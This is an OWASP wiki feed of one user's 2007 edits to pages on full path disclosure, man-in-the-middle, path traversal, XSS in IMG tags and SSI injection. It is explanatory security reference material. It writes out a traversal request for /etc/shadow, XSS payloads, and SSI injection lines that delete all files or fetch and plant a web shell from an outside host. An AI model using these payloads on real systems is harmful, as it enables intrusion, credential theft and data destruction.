https://wiki.owasp.org/api.php?action=feedcontributions&user=Ethernet&feedformat=atomOWASP - User contributions [en]2024-03-29T01:15:22ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24063Full Path Disclosure2007-12-25T04:12:00Z<p>Ethernet: /* Overview */</p>
<hr />
<div>==Overview==<br />
Full Path Disclosure (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() (within an SQL injection) query to view page sources require the attacker to have the full path to the file they wish to view.<br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre><br />
By simply setting the PHPSESSID cookie to nothing (null) we get an error.<br />
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters, <br />
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre><br />
<br />
==Preventing==<br />
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.<br />
<pre>error_reporting(0);</pre><br />
<br />
==Related Threats==<br />
[[:Category:Information Disclosure]]<br />
<br />
==Related Attacks==<br />
*[[SQL Injection]]<br />
*[[Relative Path Traversal]]<br />
<br />
==Conclusion==<br />
It must be put across very clearly that this vulnerability in no way enables an attacker to gain full control of your website. However, this exploit often accompanies another, more serious one in which this will aid an attacker in controlling your website.<br />
<br />
[[Category:Injection]]<br />
[[Category:Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24060Full Path Disclosure2007-12-24T08:39:12Z<p>Ethernet: </p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre><br />
By simply setting the PHPSESSID cookie to nothing (null) we get an error.<br />
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters, <br />
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre><br />
<br />
==Preventing==<br />
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.<br />
<pre>error_reporting(0);</pre><br />
<br />
==Related Threats==<br />
[[:Category:Information Disclosure]]<br />
<br />
==Related Attacks==<br />
*[[SQL Injection]]<br />
*[[Relative Path Traversal]]<br />
<br />
==Conclusion==<br />
It must be put across very clearly that this vulnerability in no way enables an attacker to gain full control of your website. However, this exploit often accompanies another, more serious one in which this will aid an attacker in controlling your website.<br />
<br />
[[Category:Injection]]<br />
[[Category:Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24059Full Path Disclosure2007-12-24T08:36:34Z<p>Ethernet: </p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre><br />
By simply setting the PHPSESSID cookie to nothing (null) we get an error.<br />
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters, <br />
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre><br />
<br />
==Preventing==<br />
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.<br />
<pre>error_reporting(0);</pre><br />
<br />
==Conclusion==<br />
It must be put across very clearly that this vulnerability in no way enables an attacker to gain full control of your website. However, this exploit often accompanies another, more serious one in which this will aid an attacker in controlling your website.</div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24058Full Path Disclosure2007-12-24T08:35:19Z<p>Ethernet: </p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre><br />
By simply setting the PHPSESSID cookie to nothing (null) we get an error.<br />
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters, <br />
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre><br />
<br />
==Preventing==<br />
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.<br />
<pre>error_reporting(0);</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24057Full Path Disclosure2007-12-24T08:32:50Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre><br />
By simply setting the PHPSESSID cookie to nothing (null) we get an error.<br />
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters, <br />
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24056Full Path Disclosure2007-12-24T08:32:32Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre><br />
By simply setting the PHPSESSID cookie to nothing (null) we get an error.<br />
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24055Full Path Disclosure2007-12-24T08:31:42Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* '''Empty Array'''<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* '''Null Session Cookie'''<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24054Full Path Disclosure2007-12-24T08:31:30Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
* Empty Array<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
* Null Session Cookie<br />
<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24053Full Path Disclosure2007-12-24T08:31:14Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
*Empty Array<br />
<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
'''Null Session Cookie<br />
'''<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24052Full Path Disclosure2007-12-24T08:30:41Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
'''Empty Array<br />
'''<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
'''Null Session Cookie<br />
'''<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24051Full Path Disclosure2007-12-24T08:30:23Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
'''Empty Array'''<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
'''Null Session Cookie'''<br />
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.<br />
A simple injection using this method would look something like so:<br />
<pre>javascript:void(document.cookie="PHPSESSID=");</pre></div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24050Full Path Disclosure2007-12-24T08:28:40Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
'''Empty Array'''<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131</pre><br />
<br />
'''Null Session Cookie'''</div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24049Full Path Disclosure2007-12-24T08:27:52Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
'''Empty Array<br />
'''<br />
If we have a site that uses a method of requesting a page like this:<br />
<pre>http://site.com/index.php?page=about</pre><br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
<pre>http://site.com/index.php?page[]=about</pre><br />
This renders the page defunct thus spitting out an error:<br />
Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131</div>Ethernethttps://wiki.owasp.org/index.php?title=Full_Path_Disclosure&diff=24048Full Path Disclosure2007-12-24T08:26:49Z<p>Ethernet: New page: {{Template:SecureSoftware}} ==Overview== Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulne...</p>
<hr />
<div>{{Template:SecureSoftware}}<br />
<br />
==Overview==<br />
Full Path Disclose (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/. Certain vulnerabilities such as using the load_file() query to view page sources require the attacker to have the full path to the file they wish to view. <br />
<br />
==Severity==<br />
Low to Medium (circumstantial)<br />
<br />
==Exploit Likely-Hood==<br />
Extremely High<br />
<br />
==Examples==<br />
'''Empty Array<br />
'''<br />
If we have a site that uses a method of requesting a page like this:<br />
http://site.com/index.php?page=about<br />
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:<br />
http://site.com/index.php?page[]=about<br />
This renders the page defunct thus spitting out an error:<br />
Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84<br />
Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131</div>Ethernethttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=18290Man-in-the-middle attack2007-04-29T21:36:53Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
A Man In The Middle (MITM) attack is a form of attack in which an evil hacker can trick end users in to thinking he is a bank or other such service in order to 'sniff' or steal the users login credentials.<br />
<br />
==Examples ==<br />
[[Image:MITM.jpg]]<br />
Image courtesy of www.arcot.com [http://www.arcot.com/mitm/images/mitm_diagram_lg.gif]<br />
<br><br />
In this example you see the attacker intercepting, logging and stealing any information passed to the server.<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
[[SSL man-in-the-middle attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}</div>Ethernethttps://wiki.owasp.org/index.php?title=File:MITM.jpg&diff=18289File:MITM.jpg2007-04-29T21:36:33Z<p>Ethernet: </p>
<hr />
<div></div>Ethernethttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=18288Man-in-the-middle attack2007-04-29T21:35:57Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
A Man In The Middle (MITM) attack is a form of attack in which an evil hacker can trick end users in to thinking he is a bank or other such service in order to 'sniff' or steal the users login credentials.<br />
<br />
==Examples ==<br />
[[Image:test]]<br />
Image courtesy of www.arcot.com [http://www.arcot.com/mitm/images/mitm_diagram_lg.gif]<br />
<br><br />
In this example you see the attacker intercepting, logging and stealing any information passed to the server.<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
[[SSL man-in-the-middle attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}</div>Ethernethttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=18287Man-in-the-middle attack2007-04-29T21:35:10Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
A Man In The Middle (MITM) attack is a form of attack in which an evil hacker can trick end users in to thinking he is a bank or other such service in order to 'sniff' or steal the users login credentials.<br />
<br />
==Examples ==<br />
<img src='http://www.arcot.com/mitm/images/mitm_diagram_lg.gif'><br />
Image courtesy of www.arcot.com [http://www.arcot.com/mitm/images/mitm_diagram_lg.gif]<br />
<br><br />
In this example you see the attacker intercepting, logging and stealing any information passed to the server.<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
[[SSL man-in-the-middle attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}</div>Ethernethttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=18286Man-in-the-middle attack2007-04-29T21:34:23Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
A Man In The Middle (MITM) attack is a form of attack in which an evil hacker can trick end users in to thinking he is a bank or other such service in order to 'sniff' or steal the users login credentials.<br />
<br />
==Examples ==<br />
[[Image:http://www.arcot.com/mitm/images/mitm_diagram_lg.gif]]<br />
Image courtesy of www.arcot.com [http://www.arcot.com/mitm/images/mitm_diagram_lg.gif]<br />
<br><br />
In this example you see the attacker intercepting, logging and stealing any information passed to the server.<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
[[SSL man-in-the-middle attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}</div>Ethernethttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=18285Man-in-the-middle attack2007-04-29T21:33:28Z<p>Ethernet: /* Description */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
A Man In The Middle (MITM) attack is a form of attack in which an evil hacker can trick end users in to thinking he is a bank or other such service in order to 'sniff' or steal the users login credentials.<br />
<br />
==Examples ==<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
[[SSL man-in-the-middle attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}</div>Ethernethttps://wiki.owasp.org/index.php?title=Path_Traversal&diff=18282Path Traversal2007-04-29T19:33:12Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
Also refered to as 'Directory Traversal' this type of attack enables an attacker to move through the server directories, outside of the normal webroot. From there he is able to view critical system files, source codes and many other things. He could even carry out Cross Server attacks if he wishes.<br />
<br />
==Examples ==<br />
An attacker approaches our hypothetical website 'bank.com'. He browses the site. He soon notices that the website uses GET requests in order to view pages.<br><br />
http://bank.com/index.php?page=transaction.php<br><br />
When viewing this link the page 'transaction.php' is called. The attacker tries a Path Traversal attack:<br><br />
http://bank.com/index.php?page=../../../../../../../../etc/shadow<br><br />
He now has access to the passwords.<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:File System]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Path_Traversal&diff=18281Path Traversal2007-04-29T19:31:08Z<p>Ethernet: /* Description */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
Also refered to as 'Directory Traversal' this type of attack enables an attacker to move through the server directories, outside of the normal webroot. From there he is able to view critical system files, source codes and many other things. He could even carry out Cross Server attacks if he wishes.<br />
<br />
==Examples ==<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:File System]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Script_in_IMG_tags&diff=18280Script in IMG tags2007-04-29T19:28:13Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
It is possible for an attacker to execute Javascript code via the IMG tags. This is also refered to as XSS (Cross Site Scripting).<br />
<br />
==Examples ==<br />
The following are methods an attacker can use in order to execute Javascript.<br><br><br />
<br />
<IMG SRC="javascript:alert('Vulnerable');"><br><br />
<IMG SRC=javascript:alert('XSS')><br><br />
<IMG SRC=JaVaScRiPt:alert('XSS')><br><br />
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br><br />
<IMG SRC=`javascript:alert("RSnake says, <br><br />
'XSS'")`><br ><br />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br><br />
<IMG <br><br />
SRC=javascript:alert(String.fromCharCode(88,83,83))><br><br />
<IMG <br> SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br><br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
[[XSS Attacks]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Script_in_IMG_tags&diff=18279Script in IMG tags2007-04-29T19:25:56Z<p>Ethernet: /* Description */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
It is possible for an attacker to execute Javascript code via the IMG tags. This is also refered to as XSS (Cross Site Scripting).<br />
<br />
==Examples ==<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
[[XSS Attacks]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=18278Server-Side Includes (SSI) Injection2007-04-29T19:22:43Z<p>Ethernet: /* Related Threats */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.<br />
<br />
==Examples ==<br />
'''Linux'''<br><br />
List Files - <font color='red'>< !--#exec cmd="ls" --></font><br><br />
Remove All - <font color='red'>< !--#exec cmd="rm -rf /*" --></font><br><br />
Navigate Directories - <font color='red'>< !--#exec cmd="cd /root/dir/" --><</font>br><br />
Plant Shell - <font color='red'>< !--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --></font><br><br />
<br><br />
'''Windows'''<br><br />
List Files - <font color='red'>< !--#exec cmd="dir" --></font><br><br />
